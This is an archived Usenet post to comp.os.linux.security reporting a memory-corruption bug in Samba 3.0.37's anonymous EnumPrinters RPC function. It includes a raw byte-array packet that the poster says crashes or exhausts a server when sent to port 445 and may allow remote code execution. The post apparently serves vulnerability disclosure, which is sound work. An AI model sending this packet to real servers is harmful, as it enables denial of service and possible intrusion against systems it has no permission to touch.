Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > comp.os.linux.security > #646
| From | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| Newsgroups | comp.os.linux.security |
| Subject | [Samba 3.0.37] EnumPrinters memory consumption |
| Date | 2015-05-18 18:56 +0200 |
| Organization | Aioe.org NNTP Server |
| Message-ID | <mjd5k6$594$1@speranza.aioe.org> (permalink) |
Hello, there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function (anonymous access), the bug is in parse_prs.c:398, we take control of length and source pointer of a memcpy, leading to memory corruption, very fast exhaustion of resources (block of computer very easy) and, probably, remote code execution. This is the packet code to be sent to port 445, EnumPrinters rpc function, opcode 0x0. char fr1[]="\x0a\x00\x00\x00\x21\xd3\x9f\x98\x06\x00\x00\x00\x00\x00\x00\x00" "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" "\xd8\x50\x60\x00\x21\x33\x33\x73\x00\x00\x00\x01\x42\x42\x06\x20" "\x0a\x00\x00\x00\x21\xd3\x9f\x28\x06\x00\x00\x00\x00\x00\x00\x00" "\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" "\xd8\x50\x60\x20\x21\x33\x33\x2a\x40\x40\x40\x20\x45\x45\x06\x20" "\x00\x00" Gabriele Avosani P.S. Looking for job as remote programmer (short and long terms). Php, Perl, Java, C/C++ and more (Linux and Windows), thanks in advance.
Back to comp.os.linux.security | Previous | Next — Next in thread | Find similar
[Samba 3.0.37] EnumPrinters memory consumption "Gabriele Avosani" <g.avosani@gmail.com> - 2015-05-18 18:56 +0200 Re: [Samba 3.0.37] EnumPrinters memory consumption Richard Kettlewell <rjk@greenend.org.uk> - 2015-05-19 18:04 +0100
csiph-web